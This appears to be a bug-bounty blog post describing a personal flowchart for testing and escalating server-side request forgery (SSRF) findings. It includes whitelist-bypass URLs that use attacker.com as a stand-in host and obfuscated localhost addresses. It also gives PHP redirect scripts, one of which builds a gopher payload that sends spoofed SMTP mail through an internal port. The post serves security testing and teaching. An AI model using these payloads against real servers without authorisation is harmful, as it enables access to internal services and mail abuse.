Since I've seen so many people ask what to do once they get a request back to their collaborator instance, I created this flowchart to present what I usually do to test and escalate SSRFs.
I am sure there are a few other ways of bypassing ssrf filters which I did not include, however this flowchart shows the ones I personally test against.
DNS queries only are rarely exploitable, and should never be reported without any additional impact.
When using your listener as an email domain test@burpcollaborator.com, recieving SMTP + DNS queries are not signs of SSRF. It's just how SMTP works and should never be reported. There's been edge cases where the payload test@burpcollaborator.com, lead to http requests. If that's the case, SSRF might be possible. See d0nut's Piercing the veal story 4.
Some common whitelist filter bypasses I test against:
https://target.com@attacker.com
https://attacker.com/target.com
https://target.com.attacker.com
Inspired from EdOverflow's blogpost on exploiting Ruby's Resolv
http://0177.1:22/
http://0x7f.1:22/
http://127.000.001:22/
See more at PayloadsAllTheThings SSRF
The value appended to location will be the url your page will redirect to. You can also play around with different status codes other than 301, such as 302,303,307.
<?php
header("Location: http://127.0.0.1", TRUE, 301);
exit();
?>
Inspired from d0nut's Piercing the veal
<?php
$commands = array(
'HELO victim.com',
'MAIL FROM: <admin@victim.com>',
'RCPT To: <sxcurity@oou.us>',
'DATA',
'Subject: @sxcurity!',
'Corben was here, woot woot!',
'.'
);
$payload = implode('%0A', $commands);
header('Location: gopher://0:25/_'.$payload);
?>
Payload taken from PayloadsAllTheThings SSRF
Orange Tsai's blackhat presentation explains this perfectly. (
PDF slides +
Youtube presentation )
I also highly recommend watching Liveoverflow's video (PHP include and bypass SSRF protection with two DNS A records ) which discusses url parsing incosistencies, while also touching on DNS Rebinding.